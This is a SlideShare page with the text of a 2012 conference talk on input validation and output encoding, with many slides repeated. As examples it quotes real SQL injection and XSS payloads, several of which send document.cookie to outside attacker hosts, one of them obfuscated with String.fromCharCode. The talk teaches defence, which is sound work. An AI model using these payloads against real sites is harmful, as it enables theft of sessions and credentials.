SlideShare a Scribd company logo

Input sanitization

Philip Tellis, profile picture
Philip Tellis

The document discusses input validation and output encoding to prevent vulnerabilities like XSS and SQL injection. It provides examples of how unexpected input can enable attacks, like special characters or invalid data types being passed to endpoints and rendered unencoded. The key lessons are that input validation is needed to receive clean, expected data, while output encoding is crucial to prevent exploits when displaying data to users. Both techniques are important defenses that address different but related issues.

TechnologySpiritual
1 of 61
Downloaded 14 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
Is What You Get, What You Expect to Get? Philip Tellis / philip@lognormal.com ConFoo.ca / 2012-03-01 ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 1
IWYGWYETG ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 2
$ finger philip Philip Tellis philip@lognormal.com @bluesmoon geek - paranoid - speedfreak co-founder Log-Normal http://bluesmoon.info/ ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 3
WARNING ! This presentation may contain unreadable code. Attempting to read it is probably not worthwhile. Definitely not at 08:30. Screaming WTF!!1! probably is. ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 4
How do you distinguish code from data? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 5
< > ’ " & % ‘ ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 6
Failure to tell the difference. . . ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 7
Note: This talk is NOT about XSS or SQLi, but it might seem like it ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 8
Let’s look at a few examples ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 9
http://xxyyzz.com/forms/contact_form.asp?i= 0%27%20UNION%20ALL%20SELECT%201,2,3,4,5,%28 %27%3c%28%20%27%2buserId%29,%28firstname %2b%27%20%27%2blastname%29,%28address%2b %27%20city:%27%2bcity%29,9,10,11,12,13,14,15,16, %28email%2b%27%20-Password:%20%27%27 %2buserpwd%2b%27%20%29%3e%27%29,18,19,20,21, 22,23,24,25,26,27,28,29,30%20FROM%20 ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 10
http://xxyyzz.com/forms/contact_form.asp?i= 0’ UNION ALL SELECT 1,2,3,4,5, ( ’ < ( ’ + userId ) , ( firstname + ’ ’ + lastname ) , ( address + ’ city: ’ + city ) ,9,10,11,12,13,14,15,16, ( email + ’ -Password: ’ ’ + userpwd + ’ ) > ’ ) ,18,19,20,21, 22,23,24,25,26,27,28,29,30 FROM ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 11
Expected a positive integer, but got more than that ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 12
<?php $id = htmlspecialchars($_GET[ ’id’ ]); ?> ... value : <?php echo ($id) ? $id : ’null’; ?> This is JavaScript code generated by PHP ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 13
id=%3Cscript%3Edocument.location=%27 http://www.silic0n.byethost8.com/index.php ?isr=%27%20+escape(document.cookie) %3C/script%3E $id should have been an integer A bug in this attack rendered it unsuccessful ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 14
id=%3Cscript%3Edocument.location=%27 http://www.silic0n.byethost8.com/index.php ?isr=%27%20+escape(document.cookie) %3C/script%3E $id should have been an integer A bug in this attack rendered it unsuccessful ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 14
id=%3Cscript%3Edocument.location=%27 http://www.silic0n.byethost8.com/index.php ?isr=%27%20+escape(document.cookie) %3C/script%3E $id should have been an integer A bug in this attack rendered it unsuccessful ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 14
Expected a positive integer, but got more than that ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 15
<a <?php echo ’href=/stock_price?f=’ . htmlspecialchars($_GET[’f’]); ?> > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 16
<a <?php echo ’href=/stock_price?f=’ . htmlspecialchars($_GET[’f’]); ?> > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 16
use the quotes luke <a " <?php echo ’href=/stock_price?f=’ . htmlspecialchars($_GET[’f’]); ?> > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 16
/stock_price?f=ACDD%20STYLE=x:expression( document.write(String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,40,100,111,99, 117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47, 115,116,97,110,100,97,114,100,51,51,46,102,114,101,101,104,111,115,116,105,97,46,99, 111,109,47,67,83,47,108,103,46,112,104,112,63,105,110,102,111,61,39,43,101,15,99,97, 112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,41,62 ))) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 17
/stock_price?f=ACDD%20STYLE=x:expression( document.write(String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,40,100,111,99, 117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47, 115,116,97,110,100,97,114,100,51,51,46,102,114,101,101,104,111,115,116,105,97,46,99, 111,109,47,67,83,47,108,103,46,112,104,112,63,105,110,102,111,61,39,43,101,15,99,97, 112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,41,62 ))) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 17
/stock_price?f=ACDD%20STYLE=x:expression( document.write(String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,40,100,111,99, 117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47, 115,116,97,110,100,97,114,100,51,51,46,102,114,101,101,104,111,115,116,105,97,46,99, 111,109,47,67,83,47,108,103,46,112,104,112,63,105,110,102,111,61,39,43,101,15,99,97, 112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,41,62 ))) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 17
The char codes translate to: <img src=x onerror=(document.location=’ http://standard33.freehostia.com/CS/lg.php?info=’ +escape(document.cookie))> $f was html encoded, but used unquoted as an attribute value. Remember that spaces are never encoded. ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 18
Expected a stock symbol, but got more than that ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 19
<?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
<?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
<?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
<?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
<?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
<?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
h=u0022u003eu003cimgu0020srcu003du0022foou0022u0020 onerroru003du0022alert(u0027xssu0027) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 21
h= " > < img src = " foo " onerror = " alert( ’ xss ’ ) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 21
h="><img src="foo" onerror="alert(’xss’) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 21
Expected a hostname, but got something completely different ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 22
Dear IE6 <input value="[e0]"> "onmouseover=alert(0) > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 23
Dear IE6 <input value="[e0]"> "onmouseover=alert(0) > That’s 0xe0, start of 3 byte seq ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 23
Dear IE6 <input value=""onmouseover=alert(0) > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 23
Expected valid UTF-8, got invalid UTF-8 ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 24
So what’s the common theme here? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 25
Should I be Validating Input or Encoding Output? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 26
They solve two different problems, and you need both ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 27
Output Encoding (done automatically by your framework) protects your users from XSS ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 28
Input Validation is a data quality issue ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 29
Is the input you get from a user of the type and range that you expect it to be? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 30
Sometimes it results in back end code injection ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 31
But it always results in bad data ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 32
Bonus Example: This hit me in production yesterday ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 33
regex to check if text was a subdomain of a known domain re=new RegExp(’^(?:[^.]+.)*’ + dom + ’$’, ’i’); re.exec(ref) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 34
Sometimes IE8 will serve requests from a .mht file mhtml:file://C:Usersblah-blah-blah.mht ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 35
I expected the regex to reject this text ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 36
What I got was 100% CPU spent in regex backtracking ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 37
;( ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 38
Unrelated Bonus Example: From a WordPress theme ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 39
<?php $value=htmlspecialchars($_GET[’value’], ENT_QUOTES); ?> <input type="text" value="<?php echo $value ?>" onfocus="if(this.value==’<?php echo $value ?>’) {this.value = ’’;}" /> ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 40
<input type="text" value="&#39;+alert(/xss/)+&#39;" onfocus="if(this.value==’&#39;+alert(/xss/)+&#39;’) {this.value = ’’;}" /> Inside an on* handler, html entities are decoded before they are passed on to JavaScript ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 41
<input type="text" value="&#39;+alert(/xss/)+&#39;" onfocus="if(this.value==’&#39;+alert(/xss/)+&#39;’) {this.value = ’’;}" /> Inside an on* handler, html entities are decoded before they are passed on to JavaScript ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 41
<input type="text" value="&#39;+alert(/xss/)+&#39;" onfocus="if(this.value==’’ +alert(/xss/)+ ’’) {this.value = ’’;}" /> Inside an on* handler, html entities are decoded before they are passed on to JavaScript ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 41
I have no idea what was expected here ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 42
Questions? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 43
Contact me Philip Tellis philip@lognormal.com @bluesmoon geek - paranoid - speedfreak co-founder Log-Normal http://bluesmoon.info/ slideshare.net/bluesmoon ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 44

More Related Content

PPTX
Inside a Digital Collection: Historic Clothing in Omeka
Arden Kirkland
 
PPTX
The Evolution of the Accounting Localizations
Odoo
 
PDF
"Internationalisation with PHP and Intl" source code
Daniel_Rhodes
 
PDF
Proposed PHP function: is_literal()
Craig Francis
 
PDF
123
Mohamed Al Dalgamouni
 
ODP
PHP 5.4
Federico Damián Lozada Mosto
 
PPT
PHP and MySQL
Sanketkumar Biswas
 
PDF
DEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slides
Felipe Prado
 
Inside a Digital Collection: Historic Clothing in Omeka
Arden Kirkland
 
The Evolution of the Accounting Localizations
Odoo
 
"Internationalisation with PHP and Intl" source code
Daniel_Rhodes
 
Proposed PHP function: is_literal()
Craig Francis
 
123
Mohamed Al Dalgamouni
 
PHP 5.4
Federico Damián Lozada Mosto
 
PHP and MySQL
Sanketkumar Biswas
 
DEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slides
Felipe Prado
 

What's hot (20)

PDF
Xcd pg
CompaniaDekartSRL
 
PPTX
Azure Video Analyzer OpenVino Extension Module on Raspberry Pi with Movidius
Knowledge & Experience
 
PDF
PHP for Grown-ups
Manuel Lemos
 
PDF
Hacking Your Way To Better Security
Colin O'Dell
 
PDF
PHP Secure Programming
Balavignesh Kasinathan
 
PDF
CO2 sequestration in a different manner
Green Minerals B.V.
 
PDF
تفسير العشر الأخير من القران الكريم ويليه احكام تهم المسلم
Islamic Invitation
 
PPTX
Hacking Your Way to Better Security - PHP South Africa 2016
Colin O'Dell
 
PDF
Man in the Middle? - No, thank you!
Daniel Schneller
 
ZIP
Ruby on Rails: Tasty Burgers
Aaron Patterson
 
PDF
User authentication module using php
Rishabh Srivastava
 
PDF
Clean code
iamAnaCortes
 
PPT
Php Security By Mugdha And Anish
OSSCube
 
PDF
[FDD 2017] Mark Seemann - Humane code
Future Processing
 
PDF
civil vs common law
vijay chittiboyina
 
PDF
Top 10 php classic traps DPC 2020
Damien Seguy
 
PPTX
Webit expo Standard Product
Boji Ditcheva
 
PDF
Arabic uae e_services_user_manual
Confidential
 
PDF
Dip Your Toes in the Sea of Security (PHP South Africa 2017)
James Titcumb
 
PDF
Comparative Genomics with GMOD and BioPerl
Jason Stajich
 
Xcd pg
CompaniaDekartSRL
 
Azure Video Analyzer OpenVino Extension Module on Raspberry Pi with Movidius
Knowledge & Experience
 
PHP for Grown-ups
Manuel Lemos
 
Hacking Your Way To Better Security
Colin O'Dell
 
PHP Secure Programming
Balavignesh Kasinathan
 
CO2 sequestration in a different manner
Green Minerals B.V.
 
تفسير العشر الأخير من القران الكريم ويليه احكام تهم المسلم
Islamic Invitation
 
Hacking Your Way to Better Security - PHP South Africa 2016
Colin O'Dell
 
Man in the Middle? - No, thank you!
Daniel Schneller
 
Ruby on Rails: Tasty Burgers
Aaron Patterson
 
User authentication module using php
Rishabh Srivastava
 
Clean code
iamAnaCortes
 
Php Security By Mugdha And Anish
OSSCube
 
[FDD 2017] Mark Seemann - Humane code
Future Processing
 
civil vs common law
vijay chittiboyina
 
Top 10 php classic traps DPC 2020
Damien Seguy
 
Webit expo Standard Product
Boji Ditcheva
 
Arabic uae e_services_user_manual
Confidential
 
Dip Your Toes in the Sea of Security (PHP South Africa 2017)
James Titcumb
 
Comparative Genomics with GMOD and BioPerl
Jason Stajich
 
Ad

Viewers also liked (7)

PDF
Boomerang at FOSS.IN/2010
Philip Tellis
 
PDF
Javascript charting with YUI-Flot
Philip Tellis
 
PDF
Boomerang at the Boston Web Performance meetup
Philip Tellis
 
PDF
MySQL Business Continuity Planning
Philip Tellis
 
PDF
Over The Top Video
Akamai Technologies
 
PDF
Websites on overdrive
Philip Tellis
 
PDF
Improving D3 Performance with CANVAS and other Hacks
Philip Tellis
 
Boomerang at FOSS.IN/2010
Philip Tellis
 
Javascript charting with YUI-Flot
Philip Tellis
 
Boomerang at the Boston Web Performance meetup
Philip Tellis
 
MySQL Business Continuity Planning
Philip Tellis
 
Over The Top Video
Akamai Technologies
 
Websites on overdrive
Philip Tellis
 
Improving D3 Performance with CANVAS and other Hacks
Philip Tellis
 
Ad

Similar to Input sanitization (20)

KEY
Webapp security testing
Tomas Doran
 
KEY
Webapp security testing
Tomas Doran
 
PDF
Remote File Inclusion (RFI) Vulnerabilities 101
Imperva
 
PDF
Bug Bounty Hunter Methodology - Nullcon 2016
bugcrowd
 
PPTX
Application and Website Security -- Fundamental Edition
Daniel Owens
 
PPTX
Secure Coding
Shubham Sharma
 
PDF
The Ultimate IDS Smackdown
Mario Heiderich
 
PDF
Web Security - Introduction
SQALab
 
PDF
Web Security - Introduction v.1.3
Oles Seheda
 
PDF
Security Vulnerabilities: How to Defend Against Them
Martin Vigo
 
PDF
Web Security attacks and defense
Jose Mato
 
PPS
Information Gathering With Google
Zero Science Lab
 
PPS
Information Gathering with Google (c0c0n - India)
Maximiliano Soler
 
PDF
Attques web
Tarek MOHAMED
 
PPTX
Secure coding | XSS Attacks on current Web Applications
n|u - The Open Security Community
 
PPTX
We cant hack ourselves secure
Eoin Keary
 
PDF
Top 10 Web Application vulnerabilities
Terrance Medina
 
TXT
New text document
sleucwnq
 
TXT
New text document
sleucwnq
 
PPT
Ethical_Hacking_ppt
Narayanan
 
Webapp security testing
Tomas Doran
 
Webapp security testing
Tomas Doran
 
Remote File Inclusion (RFI) Vulnerabilities 101
Imperva
 
Bug Bounty Hunter Methodology - Nullcon 2016
bugcrowd
 
Application and Website Security -- Fundamental Edition
Daniel Owens
 
Secure Coding
Shubham Sharma
 
The Ultimate IDS Smackdown
Mario Heiderich
 
Web Security - Introduction
SQALab
 
Web Security - Introduction v.1.3
Oles Seheda
 
Security Vulnerabilities: How to Defend Against Them
Martin Vigo
 
Web Security attacks and defense
Jose Mato
 
Information Gathering With Google
Zero Science Lab
 
Information Gathering with Google (c0c0n - India)
Maximiliano Soler
 
Attques web
Tarek MOHAMED
 
Secure coding | XSS Attacks on current Web Applications
n|u - The Open Security Community
 
We cant hack ourselves secure
Eoin Keary
 
Top 10 Web Application vulnerabilities
Terrance Medina
 
New text document
sleucwnq
 
New text document
sleucwnq
 
Ethical_Hacking_ppt
Narayanan
 

More from Philip Tellis (20)

PDF
Frontend Performance: Beginner to Expert to Crazy Person
Philip Tellis
 
PDF
Frontend Performance: De débutant à Expert à Fou Furieux
Philip Tellis
 
PDF
Frontend Performance: Expert to Crazy Person
Philip Tellis
 
PDF
Beyond Page Level Metrics
Philip Tellis
 
PDF
Frontend Performance: Beginner to Expert to Crazy Person (San Diego Web Perf ...
Philip Tellis
 
PDF
Frontend Performance: Beginner to Expert to Crazy Person
Philip Tellis
 
PDF
Frontend Performance: Beginner to Expert to Crazy Person
Philip Tellis
 
PDF
Frontend Performance: Beginner to Expert to Crazy Person
Philip Tellis
 
PDF
mmm... beacons
Philip Tellis
 
PDF
RUM Distillation 101 -- Part I
Philip Tellis
 
PDF
Improving 3rd Party Script Performance With IFrames
Philip Tellis
 
PDF
Extending Boomerang
Philip Tellis
 
PDF
Abusing JavaScript to measure Web Performance, or, "how does boomerang work?"
Philip Tellis
 
PDF
The Statistics of Web Performance Analysis
Philip Tellis
 
PDF
Abusing JavaScript to Measure Web Performance
Philip Tellis
 
PDF
Rum for Breakfast
Philip Tellis
 
PDF
Analysing network characteristics with JavaScript
Philip Tellis
 
PDF
A Node.JS bag of goodies for analyzing Web Traffic
Philip Tellis
 
PDF
Messing with JavaScript and the DOM to measure network characteristics
Philip Tellis
 
PDF
Boomerang: How fast do users think your site is?
Philip Tellis
 
Frontend Performance: Beginner to Expert to Crazy Person
Philip Tellis
 
Frontend Performance: De débutant à Expert à Fou Furieux
Philip Tellis
 
Frontend Performance: Expert to Crazy Person
Philip Tellis
 
Beyond Page Level Metrics
Philip Tellis
 
Frontend Performance: Beginner to Expert to Crazy Person (San Diego Web Perf ...
Philip Tellis
 
Frontend Performance: Beginner to Expert to Crazy Person
Philip Tellis
 
Frontend Performance: Beginner to Expert to Crazy Person
Philip Tellis
 
Frontend Performance: Beginner to Expert to Crazy Person
Philip Tellis
 
mmm... beacons
Philip Tellis
 
RUM Distillation 101 -- Part I
Philip Tellis
 
Improving 3rd Party Script Performance With IFrames
Philip Tellis
 
Extending Boomerang
Philip Tellis
 
Abusing JavaScript to measure Web Performance, or, "how does boomerang work?"
Philip Tellis
 
The Statistics of Web Performance Analysis
Philip Tellis
 
Abusing JavaScript to Measure Web Performance
Philip Tellis
 
Rum for Breakfast
Philip Tellis
 
Analysing network characteristics with JavaScript
Philip Tellis
 
A Node.JS bag of goodies for analyzing Web Traffic
Philip Tellis
 
Messing with JavaScript and the DOM to measure network characteristics
Philip Tellis
 
Boomerang: How fast do users think your site is?
Philip Tellis
 

Recently uploaded (20)

PPTX
Tartificialntelligence_presentation.pptx
ry7r52mzb4
 
PPTX
1. Introduction to Computer Programming.pptx
bonakiduza1024
 
PDF
Web App vs Mobile App What Should You Build First.pdf
KodekX
 
PDF
Accuracy of neural networks in brain wave diagnosis of schizophrenia
IAESIJAI
 
PPTX
TechTalks-8-2019-Service-Management-ITIL-Refresh-ITIL-4-Framework-Supports-Ou...
bonakiduza1024
 
PPTX
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
PDF
WOOl fibre morphology and structure.pdf for textiles
Rajendrakumar868651
 
PDF
Enhancing emotion recognition model for a student engagement use case through...
IAESIJAI
 
PPTX
Chapter 5: Probability Theory and Statistics
RandyFin
 
PPTX
A Presentation on Artificial Intelligence
memembruh336
 
PDF
Microsoft Solutions Partner Drive Digital Transformation with D365.pdf
Microsoft Dynamics
 
PPTX
Group 1 Presentation -Planning and Decision Making .pptx
MatthewLewis227954
 
PDF
NewMind AI Weekly Chronicles - August'25-Week II
NewMind AI
 
PDF
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
PPTX
SOPHOS-XG Firewall Administrator PPT.pptx
AgnesMunisi
 
PPTX
A Presentation on Touch Screen Technology
memembruh336
 
PDF
August Patch Tuesday
Ivanti
 
PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
PDF
Zenith AI: Advanced Artificial Intelligence
Biz Preneurs
 
PDF
project resource management chapter-09.pdf
ssuser00e6e21
 
Tartificialntelligence_presentation.pptx
ry7r52mzb4
 
1. Introduction to Computer Programming.pptx
bonakiduza1024
 
Web App vs Mobile App What Should You Build First.pdf
KodekX
 
Accuracy of neural networks in brain wave diagnosis of schizophrenia
IAESIJAI
 
TechTalks-8-2019-Service-Management-ITIL-Refresh-ITIL-4-Framework-Supports-Ou...
bonakiduza1024
 
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
WOOl fibre morphology and structure.pdf for textiles
Rajendrakumar868651
 
Enhancing emotion recognition model for a student engagement use case through...
IAESIJAI
 
Chapter 5: Probability Theory and Statistics
RandyFin
 
A Presentation on Artificial Intelligence
memembruh336
 
Microsoft Solutions Partner Drive Digital Transformation with D365.pdf
Microsoft Dynamics
 
Group 1 Presentation -Planning and Decision Making .pptx
MatthewLewis227954
 
NewMind AI Weekly Chronicles - August'25-Week II
NewMind AI
 
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
SOPHOS-XG Firewall Administrator PPT.pptx
AgnesMunisi
 
A Presentation on Touch Screen Technology
memembruh336
 
August Patch Tuesday
Ivanti
 
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
Zenith AI: Advanced Artificial Intelligence
Biz Preneurs
 
project resource management chapter-09.pdf
ssuser00e6e21
 

Input sanitization

  • 1. Is What You Get, What You Expect to Get? Philip Tellis / philip@lognormal.com ConFoo.ca / 2012-03-01 ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 1
  • 2. IWYGWYETG ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 2
  • 3. $ finger philip Philip Tellis philip@lognormal.com @bluesmoon geek - paranoid - speedfreak co-founder Log-Normal http://bluesmoon.info/ ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 3
  • 4. WARNING ! This presentation may contain unreadable code. Attempting to read it is probably not worthwhile. Definitely not at 08:30. Screaming WTF!!1! probably is. ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 4
  • 5. How do you distinguish code from data? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 5
  • 6. < > ’ " & % ‘ ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 6
  • 7. Failure to tell the difference. . . ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 7
  • 8. Note: This talk is NOT about XSS or SQLi, but it might seem like it ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 8
  • 9. Let’s look at a few examples ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 9
  • 10. http://xxyyzz.com/forms/contact_form.asp?i= 0%27%20UNION%20ALL%20SELECT%201,2,3,4,5,%28 %27%3c%28%20%27%2buserId%29,%28firstname %2b%27%20%27%2blastname%29,%28address%2b %27%20city:%27%2bcity%29,9,10,11,12,13,14,15,16, %28email%2b%27%20-Password:%20%27%27 %2buserpwd%2b%27%20%29%3e%27%29,18,19,20,21, 22,23,24,25,26,27,28,29,30%20FROM%20 ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 10
  • 11. http://xxyyzz.com/forms/contact_form.asp?i= 0’ UNION ALL SELECT 1,2,3,4,5, ( ’ < ( ’ + userId ) , ( firstname + ’ ’ + lastname ) , ( address + ’ city: ’ + city ) ,9,10,11,12,13,14,15,16, ( email + ’ -Password: ’ ’ + userpwd + ’ ) > ’ ) ,18,19,20,21, 22,23,24,25,26,27,28,29,30 FROM ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 11
  • 12. Expected a positive integer, but got more than that ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 12
  • 13. <?php $id = htmlspecialchars($_GET[ ’id’ ]); ?> ... value : <?php echo ($id) ? $id : ’null’; ?> This is JavaScript code generated by PHP ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 13
  • 14. id=%3Cscript%3Edocument.location=%27 http://www.silic0n.byethost8.com/index.php ?isr=%27%20+escape(document.cookie) %3C/script%3E $id should have been an integer A bug in this attack rendered it unsuccessful ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 14
  • 15. id=%3Cscript%3Edocument.location=%27 http://www.silic0n.byethost8.com/index.php ?isr=%27%20+escape(document.cookie) %3C/script%3E $id should have been an integer A bug in this attack rendered it unsuccessful ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 14
  • 16. id=%3Cscript%3Edocument.location=%27 http://www.silic0n.byethost8.com/index.php ?isr=%27%20+escape(document.cookie) %3C/script%3E $id should have been an integer A bug in this attack rendered it unsuccessful ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 14
  • 17. Expected a positive integer, but got more than that ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 15
  • 18. <a <?php echo ’href=/stock_price?f=’ . htmlspecialchars($_GET[’f’]); ?> > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 16
  • 19. <a <?php echo ’href=/stock_price?f=’ . htmlspecialchars($_GET[’f’]); ?> > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 16
  • 20. use the quotes luke <a " <?php echo ’href=/stock_price?f=’ . htmlspecialchars($_GET[’f’]); ?> > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 16
  • 21. /stock_price?f=ACDD%20STYLE=x:expression( document.write(String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,40,100,111,99, 117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47, 115,116,97,110,100,97,114,100,51,51,46,102,114,101,101,104,111,115,116,105,97,46,99, 111,109,47,67,83,47,108,103,46,112,104,112,63,105,110,102,111,61,39,43,101,15,99,97, 112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,41,62 ))) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 17
